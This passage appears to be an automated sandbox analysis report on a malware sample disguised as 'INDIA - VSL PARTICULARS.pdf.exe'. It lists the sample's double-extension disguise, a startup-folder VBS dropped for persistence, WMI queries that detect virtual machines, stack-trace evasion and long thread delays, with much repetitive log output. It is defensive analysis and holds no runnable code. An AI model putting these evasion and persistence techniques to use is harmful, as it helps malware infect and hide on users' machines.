    Source: Binary string: wntdll.pdb source: name.exe, 00000002.00000003.2227032386.00000000047D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.2226523260.0000000004630000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.2364292019.00000000045D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.2364812639.0000000004770000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000008.00000003.2400599794.0000000004770000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000008.00000003.2400477243.00000000045D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000A.00000003.2437273788.00000000045C0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000A.00000003.2437000845.0000000004760000.00000004.00001000.00020000.00000000.sdmp
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
    Source: name.exe.0.drStatic PE information: real checksum: 0xa961f should be: 0x13e000
    Source: INDIA - VSL PARTICULARS.pdf.exeStatic PE information: real checksum: 0xa961f should be: 0x13e000
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00416CB5 push ecx; ret 6_2_00416CC8
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_03F1C128 push eax; ret 6_2_03F1C129
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeFile created: C:\Users\user\AppData\Local\directory\name.exeJump to dropped file

    Boot Survival

    barindex
    Drops VBS files to the startup folder
    Source: C:\Users\user\AppData\Local\directory\name.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbsJump to dropped file
    Source: C:\Users\user\AppData\Local\directory\name.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbsJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbsJump to behavior

    Hooking and other Techniques for Hiding and Protection

    barindex
    Uses an obfuscated file name to hide its real file extension (double extension)
    Source: Possible double extension: pdf.exeStatic PE information: INDIA - VSL PARTICULARS.pdf.exe
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,6_2_0047A330
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,6_2_00434418
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
    Switches to a custom stack to bypass stack traces
    Source: C:\Users\user\AppData\Local\directory\name.exeAPI/Special instruction interceptor: Address: 3FD32B4
    Source: C:\Users\user\AppData\Local\directory\name.exeAPI/Special instruction interceptor: Address: 3F1FAA4
    Source: C:\Users\user\AppData\Local\directory\name.exeAPI/Special instruction interceptor: Address: 3F932B4
    Source: C:\Users\user\AppData\Local\directory\name.exeAPI/Special instruction interceptor: Address: 3EF027C
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599765Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599525Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599243Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599125Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599016Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598891Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598781Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598672Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598563Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598438Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598313Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598188Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598078Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597969Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597844Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597735Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597610Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597485Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597360Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597235Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597110Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596985Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596860Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596719Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596609Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596500Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596391Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596266Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596141Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596031Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595922Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595813Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595688Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595563Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595453Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595344Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595219Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595110Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594985Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594860Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594735Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594610Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594485Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594330Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594200Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594016Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593888Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593782Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593657Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593532Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
